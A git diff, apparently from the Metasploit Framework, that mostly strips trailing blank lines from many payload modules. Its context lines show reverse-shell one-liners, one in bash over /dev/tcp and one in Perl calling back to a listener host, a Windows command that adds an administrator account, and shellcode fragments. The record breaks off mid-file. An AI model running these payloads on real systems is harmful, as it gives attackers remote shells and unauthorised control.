@@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/cmd/unix/bind_inetd.rb b/modules/payloads/singles/cmd/unix/bind_inetd.rb index 8723c615cb..5cbcdf542f 100644 --- a/modules/payloads/singles/cmd/unix/bind_inetd.rb +++ b/modules/payloads/singles/cmd/unix/bind_inetd.rb @@ -83,6 +83,4 @@ module Metasploit3 return cmd end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/cmd/unix/bind_perl.rb b/modules/payloads/singles/cmd/unix/bind_perl.rb index 0b9a15b7ba..19d05e1098 100644 --- a/modules/payloads/singles/cmd/unix/bind_perl.rb +++ b/modules/payloads/singles/cmd/unix/bind_perl.rb @@ -56,6 +56,4 @@ module Metasploit3 return cmd end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/cmd/unix/generic.rb b/modules/payloads/singles/cmd/unix/generic.rb index 016e59a35e..a1d1d82449 100644 --- a/modules/payloads/singles/cmd/unix/generic.rb +++ b/modules/payloads/singles/cmd/unix/generic.rb @@ -58,6 +58,4 @@ module Metasploit3 return datastore['CMD'] || '' end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/cmd/unix/interact.rb b/modules/payloads/singles/cmd/unix/interact.rb index 014aee80d3..320d801dcd 100644 --- a/modules/payloads/singles/cmd/unix/interact.rb +++ b/modules/payloads/singles/cmd/unix/interact.rb @@ -39,6 +39,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/cmd/unix/reverse.rb b/modules/payloads/singles/cmd/unix/reverse.rb index a31cfa93f4..aa5962afb5 100644 --- a/modules/payloads/singles/cmd/unix/reverse.rb +++ b/modules/payloads/singles/cmd/unix/reverse.rb @@ -59,6 +59,4 @@ module Metasploit3 return cmd end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/cmd/unix/reverse_bash.rb b/modules/payloads/singles/cmd/unix/reverse_bash.rb index f01829c1cc..3b9d11c79b 100644 --- a/modules/payloads/singles/cmd/unix/reverse_bash.rb +++ b/modules/payloads/singles/cmd/unix/reverse_bash.rb @@ -53,6 +53,4 @@ module Metasploit3 fd = rand(200) + 20 return "0<&#{fd}-;exec #{fd}<>/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']};sh <&#{fd} >&#{fd} 2>&#{fd}"; end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/cmd/unix/reverse_perl.rb b/modules/payloads/singles/cmd/unix/reverse_perl.rb index b54da0bcee..e7412c6af1 100644 --- a/modules/payloads/singles/cmd/unix/reverse_perl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_perl.rb @@ -53,6 +53,4 @@ module Metasploit3 cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"#{datastore['LHOST']}:#{datastore['LPORT']}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'" end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/cmd/windows/bind_perl.rb b/modules/payloads/singles/cmd/windows/bind_perl.rb index da3e8d9677..241343aee4 100644 --- a/modules/payloads/singles/cmd/windows/bind_perl.rb +++ b/modules/payloads/singles/cmd/windows/bind_perl.rb @@ -56,6 +56,4 @@ module Metasploit3 return cmd end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/cmd/windows/reverse_perl.rb b/modules/payloads/singles/cmd/windows/reverse_perl.rb index 6f74019c95..8e2ec3b139 100644 --- a/modules/payloads/singles/cmd/windows/reverse_perl.rb +++ b/modules/payloads/singles/cmd/windows/reverse_perl.rb @@ -55,6 +55,4 @@ module Metasploit3 end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/generic/debug_trap.rb b/modules/payloads/singles/generic/debug_trap.rb index 8176368852..54131d3cb3 100644 --- a/modules/payloads/singles/generic/debug_trap.rb +++ b/modules/payloads/singles/generic/debug_trap.rb @@ -35,6 +35,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/generic/shell_bind_tcp.rb b/modules/payloads/singles/generic/shell_bind_tcp.rb index 40cdeade6c..04ddb7a83d 100644 --- a/modules/payloads/singles/generic/shell_bind_tcp.rb +++ b/modules/payloads/singles/generic/shell_bind_tcp.rb @@ -32,6 +32,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/generic/shell_reverse_tcp.rb b/modules/payloads/singles/generic/shell_reverse_tcp.rb index 545039af6d..d5a7711c29 100644 --- a/modules/payloads/singles/generic/shell_reverse_tcp.rb +++ b/modules/payloads/singles/generic/shell_reverse_tcp.rb @@ -32,6 +32,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb index 680571b74d..9377c3c7d6 100644 --- a/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb @@ -54,6 +54,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb index 6f69e8175c..38aab7e4b1 100644 --- a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb @@ -54,6 +54,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/linux/x86/adduser.rb b/modules/payloads/singles/linux/x86/adduser.rb index 0aead43f1c..1bacdeaa81 100644 --- a/modules/payloads/singles/linux/x86/adduser.rb +++ b/modules/payloads/singles/linux/x86/adduser.rb @@ -63,6 +63,4 @@ module Metasploit3 "\xcd\x80" end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/linux/x86/chmod.rb b/modules/payloads/singles/linux/x86/chmod.rb index f5dfeb63dc..cebf42d4bb 100644 --- a/modules/payloads/singles/linux/x86/chmod.rb +++ b/modules/payloads/singles/linux/x86/chmod.rb @@ -38,7 +38,4 @@ module Metasploit3 "\x5b" + Rex::Arch::X86.push_dword(mode) + "\x59\xcd\x80\x6a\x01\x58\xcd\x80"; end -end - - - +end \ No newline at end of file diff --git a/modules/payloads/singles/linux/x86/exec.rb b/modules/payloads/singles/linux/x86/exec.rb index 46e421ffee..5b2ac83467 100644 --- a/modules/payloads/singles/linux/x86/exec.rb +++ b/modules/payloads/singles/linux/x86/exec.rb @@ -55,6 +55,4 @@ module Metasploit3 "\x57\x53\x89\xe1\xcd\x80" end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/linux/x86/shell_bind_tcp.rb b/modules/payloads/singles/linux/x86/shell_bind_tcp.rb index 4dbda60c38..2539e4139a 100644 --- a/modules/payloads/singles/linux/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/x86/shell_bind_tcp.rb @@ -84,6 +84,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/linux/x86/shell_find_port.rb b/modules/payloads/singles/linux/x86/shell_find_port.rb index 162bece11e..9abe7d2fa6 100644 --- a/modules/payloads/singles/linux/x86/shell_find_port.rb +++ b/modules/payloads/singles/linux/x86/shell_find_port.rb @@ -48,6 +48,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/linux/x86/shell_find_tag.rb b/modules/payloads/singles/linux/x86/shell_find_tag.rb index 68641fea78..dd08aabe09 100644 --- a/modules/payloads/singles/linux/x86/shell_find_tag.rb +++ b/modules/payloads/singles/linux/x86/shell_find_tag.rb @@ -56,6 +56,4 @@ module Metasploit3 super end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb b/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb index ca3160778a..cedf39e563 100644 --- a/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb @@ -48,6 +48,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb b/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb index e361a3d8e1..dfb24b57e0 100644 --- a/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb +++ b/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb @@ -92,6 +92,4 @@ EOS )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/osx/armle/shell_bind_tcp.rb b/modules/payloads/singles/osx/armle/shell_bind_tcp.rb index 6d59bd93fc..8fc7724703 100644 --- a/modules/payloads/singles/osx/armle/shell_bind_tcp.rb +++ b/modules/payloads/singles/osx/armle/shell_bind_tcp.rb @@ -113,6 +113,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb b/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb index a213b8a4b9..489f1e8e65 100644 --- a/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb +++ b/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb @@ -100,6 +100,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/osx/armle/vibrate.rb b/modules/payloads/singles/osx/armle/vibrate.rb index 99ad9626f2..2da6c702e3 100644 --- a/modules/payloads/singles/osx/armle/vibrate.rb +++ b/modules/payloads/singles/osx/armle/vibrate.rb @@ -41,6 +41,4 @@ module Metasploit3 ].pack("V*") end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb b/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb index 27c843d1bb..70007ec1e6 100644 --- a/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb +++ b/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb @@ -57,6 +57,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb b/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb index b92eaffac3..45b96c9b20 100644 --- a/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb @@ -55,6 +55,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/osx/x86/exec.rb b/modules/payloads/singles/osx/x86/exec.rb index b160aa4e3c..ff1895ee76 100644 --- a/modules/payloads/singles/osx/x86/exec.rb +++ b/modules/payloads/singles/osx/x86/exec.rb @@ -55,6 +55,4 @@ module Metasploit3 "\x50\x53\xb0\x3b\x50\xcd\x80" end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/osx/x86/shell_bind_tcp.rb b/modules/payloads/singles/osx/x86/shell_bind_tcp.rb index 29cd6d29e3..c705a7bc93 100644 --- a/modules/payloads/singles/osx/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/osx/x86/shell_bind_tcp.rb @@ -81,6 +81,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/osx/x86/shell_find_port.rb b/modules/payloads/singles/osx/x86/shell_find_port.rb index 5107f47f5d..ed6b072360 100644 --- a/modules/payloads/singles/osx/x86/shell_find_port.rb +++ b/modules/payloads/singles/osx/x86/shell_find_port.rb @@ -76,6 +76,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb b/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb index 5f279d49aa..e7064538b0 100644 --- a/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb @@ -75,6 +75,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/php/bind_perl.rb b/modules/payloads/singles/php/bind_perl.rb index 7eb43b2488..d76c17ce1e 100644 --- a/modules/payloads/singles/php/bind_perl.rb +++ b/modules/payloads/singles/php/bind_perl.rb @@ -56,6 +56,4 @@ module Metasploit3 return cmd end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/php/bind_php.rb b/modules/payloads/singles/php/bind_php.rb index d37914e180..4684c8b91e 100644 --- a/modules/payloads/singles/php/bind_php.rb +++ b/modules/payloads/singles/php/bind_php.rb @@ -83,6 +83,4 @@ module Metasploit3 return super + php_bind_shell end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/php/exec.rb b/modules/payloads/singles/php/exec.rb index 97a7c7dc77..ff6ec77f21 100644 --- a/modules/payloads/singles/php/exec.rb +++ b/modules/payloads/singles/php/exec.rb @@ -57,6 +57,4 @@ module Metasploit3 return php_exec_cmd end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/php/reverse_perl.rb b/modules/payloads/singles/php/reverse_perl.rb index 7d55d2026f..71d2806f5e 100644 --- a/modules/payloads/singles/php/reverse_perl.rb +++ b/modules/payloads/singles/php/reverse_perl.rb @@ -59,6 +59,4 @@ module Metasploit3 cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"#{datastore['LHOST']}:#{datastore['LPORT']}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'" end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/php/reverse_php.rb b/modules/payloads/singles/php/reverse_php.rb index c8cdc59423..e5efbd24a5 100644 --- a/modules/payloads/singles/php/reverse_php.rb +++ b/modules/payloads/singles/php/reverse_php.rb @@ -113,6 +113,4 @@ module Metasploit3 return super + php_reverse_shell end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/php/shell_findsock.rb b/modules/payloads/singles/php/shell_findsock.rb index dbb135ec49..9d936e2f13 100644 --- a/modules/payloads/singles/php/shell_findsock.rb +++ b/modules/payloads/singles/php/shell_findsock.rb @@ -84,6 +84,4 @@ END_OF_PHP_CODE return php_findsock end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb b/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb index e30b2bae07..07ee21b61b 100644 --- a/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb +++ b/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb @@ -51,6 +51,4 @@ module Metasploit3 "\x82\x10\x20\x3b\x91\xd0\x20\x08" end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/solaris/sparc/shell_find_port.rb b/modules/payloads/singles/solaris/sparc/shell_find_port.rb index cf60ae1302..e0110e47af 100644 --- a/modules/payloads/singles/solaris/sparc/shell_find_port.rb +++ b/modules/payloads/singles/solaris/sparc/shell_find_port.rb @@ -47,6 +47,4 @@ module Metasploit3 "\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08" end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb b/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb index 4131a6e33c..f712759f9a 100644 --- a/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb @@ -51,6 +51,4 @@ module Metasploit3 "\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08" end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb b/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb index e11cc8d321..086d603a2a 100644 --- a/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb @@ -90,6 +90,4 @@ module Metasploit3 })) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/solaris/x86/shell_find_port.rb b/modules/payloads/singles/solaris/x86/shell_find_port.rb index 29d7ea474e..c9d32afacd 100644 --- a/modules/payloads/singles/solaris/x86/shell_find_port.rb +++ b/modules/payloads/singles/solaris/x86/shell_find_port.rb @@ -88,6 +88,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb b/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb index c2303ab147..9958b0b013 100644 --- a/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb @@ -87,6 +87,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/windows/adduser.rb b/modules/payloads/singles/windows/adduser.rb index 2d0689a55f..a2aa75334c 100644 --- a/modules/payloads/singles/windows/adduser.rb +++ b/modules/payloads/singles/windows/adduser.rb @@ -56,6 +56,4 @@ module Metasploit3 "net localgroup Administrators #{user} /ADD" end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/windows/download_exec.rb b/modules/payloads/singles/windows/download_exec.rb index ec27f246cf..da4bedaad2 100644 --- a/modules/payloads/singles/windows/download_exec.rb +++ b/modules/payloads/singles/windows/download_exec.rb @@ -80,6 +80,4 @@ module Metasploit3 return module_info['Payload']['Payload'] + (datastore['URL'] || '') + "\x80" end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/windows/exec.rb b/modules/payloads/singles/windows/exec.rb index d1b6d6c9b3..5f7c41aec9 100644 --- a/modules/payloads/singles/windows/exec.rb +++ b/modules/payloads/singles/windows/exec.rb @@ -23,6 +23,4 @@ module Metasploit3 include Msf::Payload::Windows::Exec -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/windows/shell_bind_tcp.rb b/modules/payloads/singles/windows/shell_bind_tcp.rb index b90f3ba157..549972823a 100644 --- a/modules/payloads/singles/windows/shell_bind_tcp.rb +++ b/modules/payloads/singles/windows/shell_bind_tcp.rb @@ -70,6 +70,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb b/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb index 16accc0c8b..60e4410d60 100644 --- a/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb +++ b/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb @@ -78,6 +78,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/singles/windows/shell_reverse_tcp.rb b/modules/payloads/singles/windows/shell_reverse_tcp.rb index c39f02b2fb..e73ee03d17 100644 --- a/modules/payloads/singles/windows/shell_reverse_tcp.rb +++ b/modules/payloads/singles/windows/shell_reverse_tcp.rb @@ -68,6 +68,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/stagers/bsd/x86/bind_tcp.rb b/modules/payloads/stagers/bsd/x86/bind_tcp.rb index ba98e1a6a2..da9668ccd6 100644 --- a/modules/payloads/stagers/bsd/x86/bind_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/bind_tcp.rb @@ -51,6 +51,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/stagers/bsd/x86/find_tag.rb b/modules/payloads/stagers/bsd/x86/find_tag.rb index 862043ab69..a6fd823302 100644 --- a/modules/payloads/stagers/bsd/x86/find_tag.rb +++ b/modules/payloads/stagers/bsd/x86/find_tag.rb @@ -50,6 +50,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/stagers/bsd/x86/reverse_tcp.rb b/modules/payloads/stagers/bsd/x86/reverse_tcp.rb index eaa2c92041..3467890629 100644 --- a/modules/payloads/stagers/bsd/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/reverse_tcp.rb @@ -51,6 +51,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/stagers/bsdi/x86/bind_tcp.rb b/modules/payloads/stagers/bsdi/x86/bind_tcp.rb index 4b8b8ab40d..8ae99d8e16 100644 --- a/modules/payloads/stagers/bsdi/x86/bind_tcp.rb +++ b/modules/payloads/stagers/bsdi/x86/bind_tcp.rb @@ -52,6 +52,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb b/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb index 57777db747..f64aa165cf 100644 --- a/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb @@ -52,6 +52,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/stagers/linux/x86/bind_tcp.rb b/modules/payloads/stagers/linux/x86/bind_tcp.rb index 2e8f7fd2d2..da6660963f 100644 --- a/modules/payloads/stagers/linux/x86/bind_tcp.rb +++ b/modules/payloads/stagers/linux/x86/bind_tcp.rb @@ -52,6 +52,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/stagers/linux/x86/find_tag.rb b/modules/payloads/stagers/linux/x86/find_tag.rb index 7d99b02048..7692a75845 100644 --- a/modules/payloads/stagers/linux/x86/find_tag.rb +++ b/modules/payloads/stagers/linux/x86/find_tag.rb @@ -51,6 +51,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/stagers/linux/x86/reverse_tcp.rb b/modules/payloads/stagers/linux/x86/reverse_tcp.rb index ab5dee5790..267fc658c0 100644 --- a/modules/payloads/stagers/linux/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/x86/reverse_tcp.rb @@ -53,6 +53,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/stagers/netware/reverse_tcp.rb b/modules/payloads/stagers/netware/reverse_tcp.rb index 2622b743ff..27b39bfda8 100644 --- a/modules/payloads/stagers/netware/reverse_tcp.rb +++ b/modules/payloads/stagers/netware/reverse_tcp.rb @@ -213,6 +213,4 @@ EOS )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/stagers/osx/armle/bind_tcp.rb b/modules/payloads/stagers/osx/armle/bind_tcp.rb index f7f746a2de..bf84b9ecd8 100644 --- a/modules/payloads/stagers/osx/armle/bind_tcp.rb +++ b/modules/payloads/stagers/osx/armle/bind_tcp.rb @@ -158,6 +158,4 @@ module Metasploit3 return true end -end - - +end \ No newline at end of file diff --git a/modules/payloads/stagers/osx/armle/reverse_tcp.rb b/modules/payloads/stagers/osx/armle/reverse_tcp.rb index 42675c6b37..346c176d29 100644 --- a/modules/payloads/stagers/osx/armle/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/armle/reverse_tcp.rb @@ -134,6 +134,4 @@ module Metasploit3 return true end -end - - +end \ No newline at end of file diff --git a/modules/payloads/stagers/osx/ppc/bind_tcp.rb b/modules/payloads/stagers/osx/ppc/bind_tcp.rb index 7a18ba33e7..d2aef20d47 100644 --- a/modules/payloads/stagers/osx/ppc/bind_tcp.rb +++ b/modules/payloads/stagers/osx/ppc/bind_tcp.rb @@ -57,6 +57,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/stagers/osx/ppc/find_tag.rb b/modules/payloads/stagers/osx/ppc/find_tag.rb index a1376f6562..16c143cae2 100644 --- a/modules/payloads/stagers/osx/ppc/find_tag.rb +++ b/modules/payloads/stagers/osx/ppc/find_tag.rb @@ -64,6 +64,4 @@ module Metasploit3 return false end -end - - +end \ No newline at end of file diff --git a/modules/payloads/stagers/osx/ppc/reverse_tcp.rb b/modules/payloads/stagers/osx/ppc/reverse_tcp.rb index a242206ebd..057ae21760 100644 --- a/modules/payloads/stagers/osx/ppc/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/ppc/reverse_tcp.rb @@ -55,6 +55,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/stagers/windows/bind_ipv6_tcp.rb b/modules/payloads/stagers/windows/bind_ipv6_tcp.rb index bb102dcaf3..b4592c3595 100644 --- a/modules/payloads/stagers/windows/bind_ipv6_tcp.rb +++ b/modules/payloads/stagers/windows/bind_ipv6_tcp.rb @@ -66,6 +66,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/stagers/windows/bind_nonx_tcp.rb b/modules/payloads/stagers/windows/bind_nonx_tcp.rb index 512de776a6..26c8fef440 100644 --- a/modules/payloads/stagers/windows/bind_nonx_tcp.rb +++ b/modules/payloads/stagers/windows/bind_nonx_tcp.rb @@ -58,6 +58,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/stagers/windows/bind_tcp.rb b/modules/payloads/stagers/windows/bind_tcp.rb index e14f2cbeb0..1f7de1cc36 100644 --- a/modules/payloads/stagers/windows/bind_tcp.rb +++ b/modules/payloads/stagers/windows/bind_tcp.rb @@ -62,6 +62,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/stagers/windows/findtag_ord.rb b/modules/payloads/stagers/windows/findtag_ord.rb index 72136230e7..ac2787e36e 100644 --- a/modules/payloads/stagers/windows/findtag_ord.rb +++ b/modules/payloads/stagers/windows/findtag_ord.rb @@ -49,6 +49,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/stagers/windows/passivex.rb b/modules/payloads/stagers/windows/passivex.rb index c9048a06ec..97778fd4af 100644 --- a/modules/payloads/stagers/windows/passivex.rb +++ b/modules/payloads/stagers/windows/passivex.rb @@ -101,6 +101,4 @@ module Metasploit3 return p end -end - - +end \ No newline at end of file diff --git a/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb b/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb index 2ce33325f1..dcf1a74209 100644 --- a/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb @@ -72,6 +72,4 @@ module Metasploit3 ], self.class) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/stagers/windows/reverse_nonx_tcp.rb b/modules/payloads/stagers/windows/reverse_nonx_tcp.rb index 7d64c76818..55240b5c6e 100644 --- a/modules/payloads/stagers/windows/reverse_nonx_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_nonx_tcp.rb @@ -59,6 +59,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/stagers/windows/reverse_ord_tcp.rb b/modules/payloads/stagers/windows/reverse_ord_tcp.rb index 96de702d9e..07222dd3e2 100644 --- a/modules/payloads/stagers/windows/reverse_ord_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_ord_tcp.rb @@ -53,6 +53,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/stagers/windows/reverse_tcp.rb b/modules/payloads/stagers/windows/reverse_tcp.rb index 018665e621..554fd6f8ca 100644 --- a/modules/payloads/stagers/windows/reverse_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_tcp.rb @@ -61,6 +61,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/stages/bsd/x86/shell.rb b/modules/payloads/stages/bsd/x86/shell.rb index 258eb0184d..a451776f0c 100644 --- a/modules/payloads/stages/bsd/x86/shell.rb +++ b/modules/payloads/stages/bsd/x86/shell.rb @@ -36,6 +36,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/stages/bsdi/x86/shell.rb b/modules/payloads/stages/bsdi/x86/shell.rb index 7d3b240ad7..4275f3f367 100644 --- a/modules/payloads/stages/bsdi/x86/shell.rb +++ b/modules/payloads/stages/bsdi/x86/shell.rb @@ -37,6 +37,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/stages/linux/x86/shell.rb b/modules/payloads/stages/linux/x86/shell.rb index 9c1f05d131..98f281210c 100644 --- a/modules/payloads/stages/linux/x86/shell.rb +++ b/modules/payloads/stages/linux/x86/shell.rb @@ -36,6 +36,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/stages/netware/shell.rb b/modules/payloads/stages/netware/shell.rb index 02ccb14033..b43212fba3 100644 --- a/modules/payloads/stages/netware/shell.rb +++ b/modules/payloads/stages/netware/shell.rb @@ -471,6 +471,4 @@ EOS )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/stages/osx/armle/execute.rb b/modules/payloads/stages/osx/armle/execute.rb index 43f93c3e39..3b6622f0f7 100644 --- a/modules/payloads/stages/osx/armle/execute.rb +++ b/modules/payloads/stages/osx/armle/execute.rb @@ -172,6 +172,4 @@ module Metasploit3 data.gsub("msf_stage_xxxxxxxxx.bin", "msf_stage_#{temp}.bin") end -end - - +end \ No newline at end of file diff --git a/modules/payloads/stages/osx/armle/shell.rb b/modules/payloads/stages/osx/armle/shell.rb index 41923a417b..5c6ff9734d 100644 --- a/modules/payloads/stages/osx/armle/shell.rb +++ b/modules/payloads/stages/osx/armle/shell.rb @@ -79,6 +79,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/stages/osx/ppc/shell.rb b/modules/payloads/stages/osx/ppc/shell.rb index 4f6a3bfe10..2a92666545 100644 --- a/modules/payloads/stages/osx/ppc/shell.rb +++ b/modules/payloads/stages/osx/ppc/shell.rb @@ -43,6 +43,4 @@ module Metasploit3 )) end -end - - +end \ No newline at end of file diff --git a/modules/payloads/stages/windows/dllinject.rb b/modules/payloads/stages/windows/dllinject.rb index ad807dfdc5..e6d9496c3a 100644 --- a/modules/payloads/stages/windows/dllinject.rb +++ 